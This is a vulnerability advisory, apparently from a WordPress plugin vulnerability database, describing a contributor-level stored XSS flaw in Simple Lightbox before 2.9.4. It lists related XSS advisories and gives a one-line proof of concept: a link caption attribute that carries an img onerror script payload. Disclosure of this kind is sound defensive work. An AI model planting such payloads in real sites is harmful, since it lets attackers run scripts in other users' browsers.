Simple Lightbox < 2.9.4 – Contributor+ Stored XSS | CVE 2025-3516 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its attributes before outputting them back in a page/post, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

Proof of Concept

1. As contributor create a new post containing this HTML:
`<a data-slb-caption="&lt;img src=x onerror=&quot;alert()&quot;&gt;" href="http://example.com/foo.jpg">Click me</a>`
2. If another user clicks on the link, the malicious JS is executed.

Affects Plugins

simple-lightbox

Fixed in 2.9.4

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Pierre Rudloff

Submitter

Pierre Rudloff

Verified

Yes

WPVDB ID

336a78cd-297b-4f47-a007-e33eac7f1dad

Timeline

Publicly Published

2025-04-25 (about 8 months ago)

Added

2025-04-25 (about 8 months ago)

Last Updated

2025-04-25 (about 8 months ago)

Other

Published

Title

Published

2023-05-15

Title

Video Gallery < 1.0.11 - Reflected XSS

Published

2025-03-27

Title

persian-woocommerce-shipping < 4.2.4 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2017-09-20

Title

2kb Amazon Affiliates Store <= 2.1.0 - Authenticated Cross-Site Scripting (XSS)

Published

2022-01-05

Title

WPLegalPages < 2.7.1 - Subscriber+ Arbitrary Settings Update to Stored XSS

Published

2024-09-30

Title

PDF Image Generator <= 1.5.6 - Reflected Cross-Site Scripting